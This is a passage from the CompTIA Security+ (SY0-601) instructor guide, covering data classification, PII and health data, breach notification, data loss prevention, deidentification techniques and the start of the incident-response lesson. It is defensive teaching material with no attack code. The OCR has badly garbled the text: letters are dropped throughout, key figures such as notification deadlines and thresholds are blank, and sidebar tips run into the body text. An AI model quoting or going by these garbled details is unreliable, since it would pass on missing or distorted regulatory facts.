owner might take personal responsibility for the lawful performance of data controller
and processor functions.

Show Slide(s) ata Classifications

Data Classifications
ata classification and typing schemas tag data assets so that they can be managed
through the information life cycle. A data classification schema is a decision tree
Teaching for applying one or more tags or labels to each data asset. Many data classification
Tip schemas are based on the degree of confidentiality re uired
Discuss the • ublic unclassified there are no restrictions on viewing the data. ublic
difficulty of applying information presents no risk to an organization if it is disclosed but does present a
classifications in a risk if it is modified or not available.
consistent way. It is
best not to create too • Confidential secret the information is highly sensitive, for viewing only by
many categories.
approved persons within the owner organi ation, and possibly by trusted third
parties under NDA.

• Critical top secret the information is too valuable to allow any risk of its capture.
iewing is severely restricted.

Using icrosoft Azure Information Protection to define an automatic document labeling and
watermarking policy. (Screenshot used with permission from icrosoft.)

Another type of classification schema identifies the kind of information asset

• roprietary Proprietary information or intellectual property (IP) is information
created and owned by the company, typically about the products or services that

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 441

they make or perform. I is an obvious target for a company's competitors, and I

in some industries such as defense or energy is of interest to foreign governments.
I may also represent a counterfeiting opportunity movies, music, and books,
for instance .

• rivate personal data Information that relates to an individual identity.

• ensitive This label is usually used in the conte t of personal data. rivacy
sensitive information about a person could harm them if made public and could
pre udice decisions made about them if referred to by internal procedures. As
defined by the 's eneral Data rotection egulations D , sensitive personal
data includes religious beliefs, political opinions, trade union membership, gender,
sexual orientation, racial or ethnic origin, genetic data, and health information
ec.europa.eu info law law topic data protection reform rules business and
organisations legal grounds processing data sensitive data what personal data
considered sensitive en .

Data Types Show Slide(s)

A type schema applies a more detailed label to data than simple classification. Data Types

ersonall Identifia le In ormation II Teaching

Tip
ersonall identifia le in ormation II is data that can be used to identify, contact,
You should not need
or locate an individual. A ocial ecurity Number N is a good e ample of II.
to spend too long on
Others include name, date of birth, email address, telephone number, street address, this ust make sure
biometric data, and so on. ome bits of information, such as a N, may be uni ue students are aware of
others uni uely identify an individual in combination for e ample, full name with birth these categories.
date and street address .
ome types of information may be II depending on the conte t. or e ample, when
someone browses the web using a static I address, the I address is II. An address
that is dynamically assigned by the I may not be considered II. II is often used for
password reset mechanisms and to confirm identity over the telephone. or e ample,
II may be defined as responses to challenge uestions, such as hat is your favorite
color pet movie These are the sort of comple ities that must be considered when
laws are introduced to control the collection and storage of personal data.

Customer Data
Customer data can be institutional information, but also personal information about
the customer's employees, such as sales and technical support contacts. This personal
customer data should be treated as II. Institutional information might be shared
under a nondisclosure agreement NDA , placing contractual obligations on storing and
processing it securely.

Health Information
Personal health information (PHI) or protected health information refers to
medical and insurance records, plus associated hospital and laboratory test results.
I may be associated with a specific person or used as an anonymi ed or deidentified
data set for analysis and research. An anonymi ed data set is one where the identifying
data is removed completely. A deidentified set contains codes that allow the sub ect
information to be reconstructed by the data provider.
I trades at high values on the black market, making it an attractive target. Criminals
seek to e ploit the data for insurance fraud or possibly to blackmail victims. I data is
e tremely sensitive and its loss has a permanent e ect. nlike a credit card number or

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 442 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

bank account number, it cannot be changed. Conse uently, the reputational damage
that would be caused by a I data breach is huge.

Financial Information
Financial information refers to data held about bank and investment accounts, plus
information such as payroll and ta returns. ayment card information comprises
the card number, e piry date, and the three digit card verification value C . Cards
are also associated with a IN, but this should never be transmitted to or handled by
the merchant. Abuse of the card may also re uire the holder's name and the address
the card is registered to. The ayment Card Industry Data ecurity tandard CI D
defines the safe handling and storage of this information pcisecuritystandards.org
pci security .

Government Data
Internally, government agencies have comple data collection and processing
re uirements. In the , federal laws place certain re uirements on institutions that
collect and process data about citizens and taxpayers. This data may be shared with
companies for analysis under strict agreements to preserve security and privacy.

Show Slide(s) Privacy Notices and Data Retention

rivacy Notices and
Data owners should be aware of any legal or regulatory issues that impact collection
Data Retention and processing of personal data. The right to privacy, as enacted by regulations such
as the 's eneral Data rotection egulation D , means that personal data
cannot be collected, processed, or retained without the individual's informed consent.
D ico.org.uk for organisations guide to data protection guide to the general
data protection regulation gdpr gives data sub ects rights to withdraw consent, and to
inspect, amend, or erase data held about them.

Privacy Notices
Informed consent means that the data must be collected and processed only for
the stated purpose, and that purpose must be clearly described to the user in plain
language, not legalese. This consent statement is referred to as a privacy notice. Data
collected under that consent statement cannot then be used for any other purpose.
or e ample, if you collect an email address for use as an account ID, you may not send
marketing messages to that email address without obtaining separate consent for that
discrete purpose. Purpose limitation will also restrict your ability to transfer data to
third parties.

Impact Assessments
Tracking consent statements and keeping data usage in compliance with the consent
granted is a significant management task. In organi ations that process large amounts
of personal data, technical tools that perform tagging and cross referencing of
personal data records will be re uired. A data protection impact assessment is a
process designed to identify the risks of collecting and processing personal data in the
conte t of a business work ow or pro ect and to identify mechanisms that mitigate
those risks.

Data Retention
Data retention refers to backing up and archiving information assets in order to comply
with business policies and or applicable laws and regulations. To meet compliance
and e discovery re uirements, organi ations may be legally bound to retain certain
types of data for a specified period. This type of re uirement will particularly a ect
financial data and security log data. Conversely, storage limitation principles in privacy

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 443

legislation may prevent you from retaining personal data for longer than is necessary.
This can complicate the inclusion of II in backups and archives.

Data Sovereignty and Geographical Considerations Show Slide(s)

ome states and nations may respect data privacy more or less than others and Data overeignty
likewise, some nations may disapprove of the nature and content of certain data. They and Geographical
may even be suspicious of security measures such as encryption. hen your data is Considerations
stored or transmitted in other jurisdictions, or when you collect data from citizens in
other states or other countries, you may not "own" the data in the same way as you'd
e pect or like to.

Data Sovereignty
Data sovereignty refers to a urisdiction preventing or restricting processing and
storage from taking place on systems do not physically reside within that jurisdiction.
Data sovereignty may demand certain concessions on your part, such as using location
specific storage facilities in a cloud service.
or e ample, D protections are e tended to any citi en while they are within
or A uropean conomic Area borders. Data sub ects can consent to allow a
transfer but there must be a meaningful option for them to refuse consent. If the
transfer destination urisdiction does not provide ade uate privacy regulations to
a level comparable to D , then contractual safeguards must be given to e tend
D rights to the data sub ect. In the , companies can self certify that the
protections they o er are ade uate under the rivacy hield scheme privacyshield.
gov usinesses .

Geographical Considerations
eographic access re uirements fall into two di erent scenarios
• torage locations might have to be carefully selected to mitigate data sovereignty
issues. Most cloud providers allow choice of data centers for processing and
storage, ensuring that information is not illegally transferred from a particular
privacy urisdiction without consent.

• mployees needing access from multiple geographic locations. Cloud based file and
database services can apply constraint based access controls to validate the user's
geographic location before authorizing access.

Privacy Breaches and Data Breaches Show Slide(s)

A data breach occurs when information is read or modified without authori ation. rivacy reaches and
"Read" in this sense can mean either seen by a person or transferred to a network or Data reaches
storage media. A data breach is the loss of any type of data, while a privacy breach
refers specifically to loss or disclosure of personal and sensitive data. Teaching
Tip
Organizational Consequences Note that the
definition of a breach
A data or privacy breach can have severe organi ational conse uences can be quite narrow.
It is important to
• eputation damage data breaches cause widespread negative publicity, and review legislation
customers are less likely to trust a company that cannot secure its information and determine
assets. precise compliance
requirements.
• Identity theft if the breached data is e ploited to perform identity theft, the data
subject may be able to sue for damages.

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 444 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• ines legislation might empower a regulator to levy fines. These can be fi ed sum
or in the most serious cases a percentage of turnover.

• I theft loss of company data can lead to loss of revenue. This typically occurs
when copyright material unreleased movies and music tracks is breached. The
loss of patents, designs, trade secrets, and so on to competitors or state actors can
also cause commercial losses, especially in overseas markets where I theft may be
difficult to remedy through legal action.

otifications o reaches
The re uirements for di erent types of breach are set out in law and or in regulations.
The re uirements indicate who must be notified. A data breach can mean the loss or
theft of information, the accidental disclosure of information, or the loss or damage of
information. Note that there are substantial risks from accidental breaches if e ective
procedures are not in place. If a database administrator can run a query that shows
unredacted credit card numbers, that is a data breach, regardless of whether the query
ever leaves the database server.

Escalation
A breach may be detected by technical sta and if the event is considered minor, there
may be a temptation to remediate the system and take no further notification action.
This could place the company in legal eopardy. Any breach of personal data and most
breaches of I should be escalated to senior decision makers and any impacts from
legislation and regulation properly considered.

u lic otification and isclosure

ther than the regulator, notification might need to be made to law enforcement,
individuals and third party companies a ected by the breach, and publicly through
press or social media channels. or e ample, the Health Insurance Portability and
Accountability Act (HIPAA) sets out reporting requirements in legislation, requiring
breach notification to the a ected individuals, the ecretary of the Department
of ealth and uman ervices, and, if more than individuals are a ected, to
the media hhs.gov hipaa for professionals breach notification inde .html . The
re uirements also set out timescales for when these parties should be notified. or
e ample, under D , notification must be made within hours of becoming aware
of a breach of personal data csoonline.com article how to report a data
breach under gdpr.html . egulations will also set out disclosing re uirements, or the
information that must be provided to each of the a ected parties. Disclosure is likely to
include a description of what information was breached, details for the main point of
contact, likely consequences arising from the breach, and measures taken to mitigate
the breach.
D o ers stronger protections than most federal and state laws in the , which
tend to focus on industry specific regulations, narrower definitions of personal data,
and fewer rights and protections for data sub ects. The passage of the California
Consumer rivacy Act CC A has changed the picture for domestic legislation,
however csoonline.com article california consumer privacy act what you
need to know to be compliant.html .

Show Slide(s) Data Sharing and Privacy Terms of Agreement

Data haring and
It is important to remember that although one can outsource virtually any service or
rivacy Terms of activity to a third party, one cannot outsource legal accountability for these services
Agreement or actions. ou are ultimately responsible for the services and actions that these third
parties take. If they have any access to your data or systems, any security breach in

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 445

their organi ation for e ample, unauthori ed data sharing is e ectively a breach in
yours. Issues of security risk awareness, shared duties, and contractual responsibilities
can be set out in a formal legal agreement. The following types of agreements
are common
• ervice level agreement LA a contractual agreement setting out the detailed
terms under which a service is provided. This can include terms for security access
controls and risk assessments plus processing re uirements for confidential and
private data.

• Interconnection security agreement (ISA) I As are defined by NI T's

ecurity uide for Interconnecting Information Technology ystems csrc.nist.
gov publications detail sp final . Any federal agency interconnecting its IT
system to a third party must create an I A to govern the relationship. An I A sets
out a security risk awareness process and commits the agency and supplier to
implementing security controls.

• Nondisclosure agreement NDA legal basis for protecting information assets.

NDAs are used between companies and employees, between companies and
contractors, and between two companies. If the employee or contractor breaks this
agreement and does share such information, they may face legal consequences.
NDAs are useful because they deter employees and contractors from violating the
trust that an employee places in them.

• Data sharing and use agreement under privacy regulations such as D or

I AA, personal data can only be collected for a specific purpose. Data sets can
be sub ect to pseudo anonymi ation or deidentification to remove personal
data, but there are risks of reidentification if combined with other data sources.
A data sharing and use agreement is a legal means of preventing this risk. It can
specify terms for the way a data set can be analyzed and proscribe the use of
reidentification techni ues.

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 446 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
ri acy and ata Sensiti ity oncepts
Answer the following uestions

1. hat is the di erence et een the role o data ste ard and the role o data
custodian?

The data steward role is concerned with the uality of data format, labeling,
normali ation, and so on . The data custodian role focuses on the system hosting the
data assets and its access control mechanisms.

2. hat ran e o in ormation classifications could ou implement in a data

labeling project?

ne set of tags could indicate the degree of confidentiality public, confidential secret,
or critical top secret . Another tagging schema could distinguish proprietary from
private sensitive personal data.

3. What is meant by PII?

ersonally identifiable information is any data that could be used to identify, contact,
or locate an individual.

4. You are reviewing security and privacy issues relating to a membership

database for a hobbyist site with a global audience. The site currently
collects account details with no further information. What should be added
to be in compliance with data protection regulations?

The site should add a privacy notice e plaining the purposes the personal information
is collected and used for. The form should provide a means for the user to give e plicit
and informed consent to this privacy notice.

5. ou are preparin a riefin paper or customers on the or ani ational

consequences of data and privacy breaches. You have completed sections
for reputation damage, identity theft, and IP theft. Following the CompTIA
Security+ objectives, what other section should you add?

Data and privacy breaches can lead legislators or regulators to impose fines. In some
cases, these fines can be substantial calculated as a percentage of turnover .

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 447

Topic 16B
Explain Privacy and Data
rotection ontrols

EXAM OBJECTIVES COVERED Teaching

2.1 Explain the importance of security concepts in an enterprise environment Tip
. Given a scenario, implement host or application security solutions
This topic focuses
5.5 Explain privacy and sensitive data concepts in relation to security on technical
controls for DL and
olicies and procedures are essential for e ective data governance, but they can be deidentification.
supported by technical controls too. As a security professional, you need to be aware of
the capabilities of data loss prevention DL systems and privacy enhancing database
controls, and how they can be used to protect data anywhere it resides, on hosts, in
email systems, or in the cloud.

Data Protection Show Slide(s)

Data stored within a trusted can be sub ect to authori ation mechanisms where Data rotection
the mediates access using some type of ACL. The presence of a trusted
cannot always be assumed, however. ther data protection mechanisms, notably Teaching
encryption, can be used to mitigate the risk that an authorization mechanism can Tip
be countermanded. When deploying a cryptographic system to protect data assets, Make sure students
consideration must be given to all the ways that information could potentially be can distinguish the
intercepted. This means thinking beyond the simple concept of a data file stored on a data states and the
disk. Data can be described as being in one of three states: di erent types of
encryption that can be
• Data at rest this state means that the data is in some sort of persistent used.
storage media. amples of types of data that may be at rest include financial
information stored in databases, archived audiovisual media, operational policies
and other management documents, system configuration data, and more. In this
state, it is usually possible to encrypt the data, using techniques such as whole
disk encryption, database encryption, and file or folder level encryption. It is
also possible to apply permissions access control lists ACLs to ensure only
authori ed users can read or modify the data. ACLs can be applied only if access to
the data is fully mediated through a trusted .

• Data in transit or data in motion this is the state when data is transmitted over
a network. amples of types of data that may be in transit include website traffic,
remote access traffic, data being synchroni ed between cloud repositories, and
more. In this state, data can be protected by a transport encryption protocol, such
as TL or I ec.

ith data at rest, there is a greater encryption challenge than with data in transit as the
encryption keys must be kept secure for longer. Transport encryption can use ephemeral
(session) keys.

• Data in use or data in processing this is the state when data is present in
volatile memory, such as system AM or C registers and cache. amples of
types of data that may be in use include documents open in a word processing

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 448 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

application, database data that is currently being modified, event logs being
generated while an operating system is running, and more. When a user works with
data, that data usually needs to be decrypted as it goes from in rest to in use. The
data may stay decrypted for an entire work session, which puts it at risk. owever,
trusted e ecution environment T mechanisms, such as Intel oftware uard
tensions software.intel.com content www us en develop topics software guard
e tensions details.html are able to encrypt data as it e ists in memory, so that an
untrusted process cannot decode the information.

Show Slide(s) ata filtration

Data filtration
In a workplace where mobile devices with huge storage capacity proliferate and high
bandwidth network links are readily available, attempting to prevent the loss of data by
controlling the types of storage devices allowed to connect to Cs and networks can be
impractical. nauthori ed copying or retrieval of data from a system is referred to as
data e filtration. Data e filtration attacks are one of the primary means for attackers
to retrieve valuable data, such as personally identifiable information II or payment
information, often destined for later sale on the black market. Data e filtration can take
place via a wide variety of mechanisms, including
• Copying the data to removable media or other device with storage, such as
drive, the memory card in a digital camera, or a smartphone.

• sing a network protocol, such as TT , T , , email, or Instant Messaging IM

chat. A sophisticated adversary might use a emote Access Tro an AT to perform
transfer of data over a nonstandard network port or a packet crafter to transfer
data over a standard port in a nonstandard way. The adversary may also use
encryption to disguise the data being e filtrated.

• y communicating it orally over a telephone, cell phone, or oice over I oI

network. Cell phone te t messaging is another possibility.

• sing a picture or video of the data if te t information is converted to an image

format it is very difficult for a computer based detection system to identify the
original information from the image data.

While some of these mechanisms are simple to mitigate through the use of
security tools, others may be much less easily defeated. You can protect data using
mechanisms and security controls that you have e amined previously
• nsure that all sensitive data is encrypted at rest. If the data is transferred outside
the network, it will be mostly useless to the attacker without the decryption key.

• Create and maintain o site backups of data that may be targeted for destruction or
ransom.

• nsure that systems storing or transmitting sensitive data are implementing

access controls. Check to see if access control mechanisms are granting e cessive
privileges to certain accounts.

• Restrict the types of network channels that attackers can use to transfer data from
the network to the outside. Disconnect systems storing archived data from the
network.

• Train users about document confidentiality and the use of encryption to store and
transmit data securely. This should also be backed up by and auditing policies
that ensure sta are trustworthy.

ven if you apply these policies and controls diligently, there are still risks to data from
insider threats and advanced persistent threat A T malware. Conse uently, a class of

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 449

security control software has been developed to apply access policies directly to data,
rather than ust the host or network on which data is located.

Data Loss Prevention Show Slide(s)

To apply data guardianship policies and procedures, smaller organizations might Data Loss revention
classify and type data manually. An organi ation that creates and collects large
amounts of personal data will usually need to use automated tools to assist with Interaction
this task, however. There may also be a re uirement to protect valuable intellectual Opportunity
property I data. Data loss prevention (DLP) products automate the discovery and Refer students to
classification of data types and enforce rules so that data is not viewed or transferred a vendor site for
without a proper authori ation. uch solutions will usually consist of the following more information
components: about specific DL
product features
• olicy server to configure classification, confidentiality, and privacy rules and and implementation
policies, log incidents, and compile reports. guidelines.

• ndpoint agents to enforce policy on client computers, even when they are not
connected to the network.

• Network agents to scan communications at network borders and interface with

web and messaging servers to enforce policy.

DL agents scan content in structured formats, such as a database with a formal access
control model or unstructured formats, such as email or word processing documents.
A file cracking process is applied to unstructured data to render it in a consistent
scannable format. The transfer of content to removable media, such as devices,
or by email, instant messaging, or even social media, can then be blocked if it does
not conform to a predefined policy. Most DL solutions can e tend the protection
mechanisms to cloud storage services, using either a pro y to mediate access or the
cloud service provider's A I to perform scanning and policy enforcement.

Creating a P policy in Office 6 . (Screenshot used with permission from icrosoft.)

emediation is the action the DL software takes when it detects a policy violation. The
following remediation mechanisms are typical:
• Alert only the copying is allowed, but the management system records an incident
and may alert an administrator.

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 450 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• lock the user is prevented from copying the original file but retains access to it.
The user may or may not be alerted to the policy violation, but it will be logged as an
incident by the management engine.

• uarantine access to the original file is denied to the user or possibly any user .
This might be accomplished by encrypting the file in place or by moving it to a
uarantine area in the file system.

• Tombstone the original file is uarantined and replaced with one describing the
policy violation and how the user can release it again.

hen it is configured to protect a communications channel such as email, DL

remediation might take place using client side or server side mechanisms. or
e ample, some DL solutions prevent the actual attaching of files to the email before it
is sent. Others might scan the email attachments and message contents, and then strip
out certain data or stop the email from reaching its destination.
ome of the leading vendors include McAfee skyhighnetworks.com cloud data
loss prevention , ymantec roadcom broadcom.com products cyber security
information protection data loss prevention , and Digital uardian digitalguardian.
com . A DL and compliance solution is also available with Microsoft's ffice
suite docs.microsoft.com en us microsoft compliance data loss prevention
policies view o worldwide .

Show Slide(s) Rights Management Services

Rights Management
As another e ample of data protection and information management solutions,
ervices Microsoft provides an Information ights Management I M feature in their ffice
productivity suite, hare oint document collaboration services, and change
messaging server. I M works with the Active Directory ights Management ervices
M or the cloud based A ure Information rotection. These technologies provide
administrators with the following functionality:
• Assign file permissions for di erent document roles, such as author, editor,
or reviewer.

• estrict printing and forwarding of documents, even when sent as file attachments.

• Restrict printing and forwarding of email messages.

Configuring a rights management template. (Screenshot used with permission from icrosoft.)

ights management is built into other secure document solutions, such as Adobe
Acrobat.

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 451

Privacy Enhancing Technologies Show Slide(s)

Data minimization is the principle that data should only be processed and stored if rivacy nhancing
that is necessary to perform the purpose for which it is collected. In order to prove Technologies
compliance with the principle of data minimization, each process that uses personal
data should be documented. The work ow can supply evidence of why processing and Teaching
storage of a particular field or data point is re uired. Data minimi ation a ects the data Tip
retention policy. It is necessary to track how long a data point has been stored for since Make sure students
it was collected and whether continued retention supports a legitimate processing can use this
function. Another impact is on test environments, where the minimi ation principle terminology correctly.
forbids the use of real data records.
Counterintuitively, the principle of minimi ation also includes the principle of
sufficiency or ade uacy. This means that you should collect the data re uired for the
stated purpose in a single transaction to which the data sub ect can give clear consent.
Collecting additional data later would not be compliant with this principle.
Large data sets are often shared or sold between organi ations and companies,
especially within the healthcare industry. here these data sets contain II or
I, steps can be taken to remove the personal or identifying information. These
deidentification processes can also be used internally, so that one group within
a company can receive data for analysis without unnecessary risks to privacy.
Deidentification methods may also be used where personal data is collected to
perform a transaction but does not need to be retained thereafter. This reduces
compliance risk when storing data by applying minimi ation principles. or e ample,
a company uses a customer's credit card number to take payment for an order. When
storing the order details, it only keeps the final digits of the card as part of the
transaction log, rather than the full card number.
A fully anonymi ed data set is one where individual sub ects can no longer be
identified, even if the data set is combined with other data sources. Identifying
information is permanently removed. nsuring full anonymi ation and preserving the
utility of data for analysis is usually very difficult, however. Conse uently, pseudo
anonymization methods are typically used instead. Pseudo-anonymization modifies
or replaces identifying information so that reidentification depends on an alternate
data source, which must be kept separate. ith access to the alternated data, pseudo
anonymi ation methods are reversible.
It is important to note that given sufficient conte tual information, a data sub ect can
be reidentified, so great care must be taken when applying deidentification methods
for distribution to di erent sources. A reidentification attack is one that combines a
deidentified data set with other data sources, such as public voter records, to discover
how secure the deidentification method used is.

-anonymous information is data that can be linked to two or more individuals. This
means that the data does not unambiguously reidentify a specific individual, but there is a
significant risk of reidentification, given the value of . or example, if k , any group that
can be identified within the data set contains at least five individuals. IST has produced an
overview of deidentification issues, in draft form at the time of writing (csrc.nist.gov CS C
media Publications sp 00-1 draft documents sp 00 1 draft .pdf).

ata ase eidentification ethods Show Slide(s)

Deidentification methods are usually implemented as part of the database Database

management system D M hosting the data. ensitive fields will be tagged for Deidentification
deidentification whenever a uery or report is run. Methods

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 452 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Data Masking
Data masking can mean that all or part of the contents of a field are redacted,
by substituting all character strings with for e ample. A field might be partially
redacted to preserve metadata for analysis purposes. or e ample, in a telephone
number, the dialing prefi might be retained, but the subscriber number redacted.
Data masking can also use techni ues to preserve the original format of the field. Data
masking is an irreversible deidentification techni ue.

Tokenization
Tokenization means that all or part of data in a field is replaced with a randomly
generated token. The token is stored with the original value on a token server or token
vault, separate to the production database. An authori ed uery or app can retrieve
the original value from the vault, if necessary, so tokeni ation is a reversible techni ue.
Tokenization is used as a substitute for encryption, because from a regulatory
perspective an encrypted field is the same value as the original data.

Aggregation/Banding
Another deidentification techni ue is to generali e the data, such as substituting a
specific age with a broader age band.

Hashing and Salting

A cryptographic hash produces a fi ed length string from arbitrary length plainte t
data using an algorithm such as A. If the function is secure, it should not be possible
to match the hash back to a plainte t. ashing is mostly used to prove integrity. If two
sources have access to the same plainte t, they should derive the same hash value.
ashing is used for two main purposes within a database
• As an inde ing method to speed up searches and provide deidentified references to
records.

• As a storage method for data such as passwords where the original plainte t does
not need to be retained.

A salt is an additional value stored with the hashed data field. The purpose of salt is
to frustrate attempts to crack the hashes. It means that the attacker cannot use pre
computed tables of hashes using dictionaries of plainte ts. These tables have to be
recompiled to include the salt value.

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 453

Review Activity:
ri acy and ata rotection ontrols
Answer the following uestions

1. To what data state does a trusted execution environment apply data

protection?

Data in processing data in use.

2. You take an incident report from a user trying to access a REPORT.docx

file on a hare oint site The file has een replaced a T doc
A A TI t t file containin a polic iolation notice hat is the most
likely cause?

This is typical of a data loss prevention DL policy replacing a file involved in a policy
violation with a tombstone file.

3. You are preparing a solution overview on privacy enhancing technologies

based on CompTIA Security+ syllabus objectives. You have completed notes
under the following headings—which other report section do you need?

Data minimization, Anonymization, Pseudo-anonymization, Data masking,

Aggregation/Banding

Tokeni ation replacing data with a randomly generated token from a separate token
server or vault. This allows reconstruction of the original data if combined with the
token vault.

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 454 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 16
Summary
Teaching ou should be able e plain the importance of data governance policies and tools to
Tip mitigate the risk data breaches and privacy breaches and implement security solutions
Check that students for data protection.
are confident about
the content that has
been covered. If there Guidelines for Data Privacy and Protection
is time, revisit any
content examples that ollow these guidelines for creating or improving data governance policies and
they have uestions controls:
about. If you have
used all the available
• nsure that confidential and personal data is classified and managed using an
time for this lesson information life cycle model.
block, note the issues,
and schedule time for • Assign roles to ensure the proper management of data within the life cycle owners,
a review later in the custodians, stewards, controllers, processors, and privacy officers .
course.
• Develop classifications for confidential and personal information, based on standard
descriptors such as public, private, sensitive, confidential, critical, proprietary, II,
health information, financial information, and customer data.

• Make impact assessments for breach events and identify notification and reporting
requirements.

• se a content management system that enables classification tagging of files and

records.

• se encryption products to ensure data protection at rest, in transit, and in

processing.

• Deploy a data loss prevention system that enforces sharing and distribution policies
to files and records across di erent transmission mechanisms file systems, email,
messaging, and cloud .

• hen sharing personal data, ensure appropriate deidentification mechanisms are

applied, such as masking or tokenization.

esson 16 Explaining ata Privacy and Protection Concepts

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 17
Performing Incident Response

LESSON INTRODUCTION Teaching

Tip
From a day-to-day perspective, incident response means investigating the alerts Having completed
produced by monitoring systems and issues reported by users. This activity is guided the lengthy review of
by policies and procedures and assisted by various technical controls. systems that involve
the "protect" function,
Incident response is a critical security function and very large part of your work as this lesson looks at the
a security professional will be taken up with it. You must be able to summarize the "respond" function.
phases of incident handling, utilize appropriate data sources to assist an investigation,
and apply mitigation techniques to secure the environment after an event.

Lesson Objectives
In this lesson, you will:
• Summarize incident response procedures.

• Utilize appropriate data sources for incident response.

• Apply mitigation controls.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 456 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 17A
Summarize Incident
esponse rocedures

Teaching EXAM OBJECTIVES COVERED

Tip 4.2 Summarize the importance of policies, processes, and procedures for incident response
This topic focuses on
policies and processes
to give an overview of
the incident response
ective incident response is governed by formal policies and procedures, setting out
function. roles and responsibilities for an incident response team. You must understand the
importance of following these procedures and performing your assigned role within
the team to the best of your ability.

Show Slide(s) Incident esponse rocess

Incident Response
Incident response policy sets the resources, processes, and guidelines for dealing with
rocess security incidents. Incident management is vital to mitigating risk. As well as controlling
the immediate or specific threat to security, e ective incident management preserves
Teaching an organization's reputation.
Tip
Incident response follows a well-structured process, such as that set out in the NIST
Incident response is
Computer Security Incident Handling Guide special publication (nvlpubs.nist.gov/
discussed in Network+
now, but make sure nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf). The following are the principal
you allow time to stages in an incident response life cycle:
recap on the basic
processes.
1. reparation make the system resilient to attack in the first place. This includes
hardening systems, writing policies and procedures, and setting up confidential
Note that there are
several di erent lines of communication. It also implies creating incident response resources and
models for this procedures.
process, some of
which con ate the 2. Identification from the information in an alert or report, determine whether
tasks into fewer steps. an incident has taken place, assess how severe it might be (triage), and
notify stakeholders.

3. Containment—limit the scope and magnitude of the incident. The principal aim
of incident response is to secure data while limiting the immediate impact on
customers and business partners.

4. Eradication—once the incident is contained, remove the cause and restore the
a ected system to a secure state by applying secure configuration settings and
installing patches.

5. Recovery—with the cause of the incident eradicated, the system can be

reintegrated into the business process that it supports. This recovery phase may
involve restoration of data from backup and security testing. Systems must be
monitored more closely for a period to detect and prevent any reoccurrence
of the attack. The response process may have to iterate through multiple
phases of identification, containment, eradication, and recovery to e ect a
complete resolution.

Lesson 17: Performing Incident Response | Topic 17A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 457

6. Lessons learned—analyze the incident and responses to identify whether

procedures or systems could be improved. It is imperative to document the
incident. The outputs from this phase feed back into a new preparation phase in
the cycle.

Incident response is likely to require coordinated action and authorization from several
di erent departments or managers, which adds further levels of comple ity.

Phases in incident response.

Cyber Incident Response Team Show Slide(s)

Preparing for incident response means establishing the policies and procedures Cyber Incident
for dealing with security breaches and the personnel and resources to implement Response Team
those policies.
ne of the first challenges lies in defining and categori ing types of incidents. An
incident is generally described as an event where security is breached or there is an
attempted breach. NI T describes an incident as the act of violating an e plicit or
implied security policy." In order to identify and manage incidents, you should develop
some method of reporting, categorizing, and prioritizing them (triage), in the same way
that troubleshooting support incidents can be logged and managed.
As well as investment in appropriate detection and analysis software, incident
response re uires e pert staffing. Large organi ations will provide a dedicated team as
a single point of contact for the notification of security incidents. This team is variously
described as a cyber incident response team (CIRT), computer security incident
response team (CSIRT), or computer emergency response team (CERT). Incident
response might also involve or be wholly located within a security operations center
C . owever it is set up, the team needs a mi ture of senior management decision
makers (up to director level) who can authorize actions following the most serious
incidents, managers, and technicians who can deal with minor incidents on their own
initiative.
Another important consideration is availability. Incident response will typically require
